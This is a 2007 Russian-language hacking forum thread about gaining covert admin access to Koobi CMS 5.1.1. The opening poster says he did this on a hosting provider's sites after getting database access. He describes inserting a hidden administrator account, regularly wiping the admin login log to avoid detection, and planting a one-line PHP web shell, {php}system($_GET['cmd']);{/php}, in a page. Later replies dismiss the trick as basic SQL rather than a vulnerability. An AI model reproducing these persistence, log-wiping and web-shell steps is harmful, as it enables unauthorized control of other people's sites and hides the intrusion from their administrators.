Добавление скрытого пользователя в Koobi CMS 5.1.1

Discussion in 'Веб-уязвимости' started by otmorozok428, 11 Dec 2007.

  1. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    129
    Likes Received:
    91
    Reputations:
    17
    Недавно обнаружил прикольную фичу с добавлением пользователя. В общем, у меня был доступ к базе данных, а ля phpMyAdmin, но в админку CMS проникнуть никак не получалось, поскольку админский пароль был пошифрован md5 и никак не брутился.

    Решение было вполне естественным - я добавил в базу CMS Koobi, своего юзера с админскими правами

    Здесь uid - уникальный порядковый номер пользователя,
    uname - имя пользователя,
    ugroup равный 1, указывает на то, что юзер - член группы админов,
    email используется для логина, а
    pass - это md5-хеш нашего пароля (в данном случае "123").

    Успешно залогинившись и решив полюбоваться на себя в списке пользователей - обнаружил там лишь легальных зарегистрированных юзеров. Попробовал найти себя через поиск, но тоже обломался.

    Правда, есть и палевный момент - если зайти в меню, где отображаются группы пользователей, можно увидеть, что в группе "Администраторы" состоят целых 2 чела, тогда как отображается только 1. Кроме того, в таблице koobi_adminlogs отображаются логины ВСЕХ существующих админов, т.е. эту табу надо регулярно подчищать.

    После этого, я со спокойной совестью зайшёл в пункт "Статические страницы/Страницы/Редактировать" и добавил свою скромную лепту в текст какой-то статьи. Вот, так
    {php}system($_GET['cmd']);{/php}
    .
     
    2 people like this.
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    А вчем суть то, то что ты умеешь составлять SQL выражения? а насчет скрытности, я Koobi CMS не видел, но могу предположить, что за отображение отвечает другая табличка или вобще там какоето кеширование происходит, скорее всего первое
     
  3. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    129
    Likes Received:
    91
    Reputations:
    17
    Суть в том, что ты имеешь невидимого пользователя в CMS с админскими правами. Согласись, Scipio, не всегда удобно работать с базой данных напрямую...
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Вобще когда что нить взламываешь очень много неудобных вещей бывает, в твоем случае все довольно удобно сложилось, плюсенги я тебе за оформление поставлю, но суть твоего поста сводится к тому:"посмотрите как я умею", имхо пользы никакой
     
  5. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    129
    Likes Received:
    91
    Reputations:
    17
    Собственно, это хостинг был :) Там было очень много неудобных phpMyAdminоv и надо было как-то в админки попасть... Действительно, очень удобно получилось :)
     
  6. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    799
    Likes Received:
    710
    Reputations:
    301
    Это не уязвимость Cms имхо.
     
  7. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Это вообще не уязвимость.
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    это называется я научился основам Sql
     
  9. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    129
    Likes Received:
    91
    Reputations:
    17
    Налетели гуру и порвали в клочья :(
    Ну не уязвимость - просто интересный факт...
     
Loading...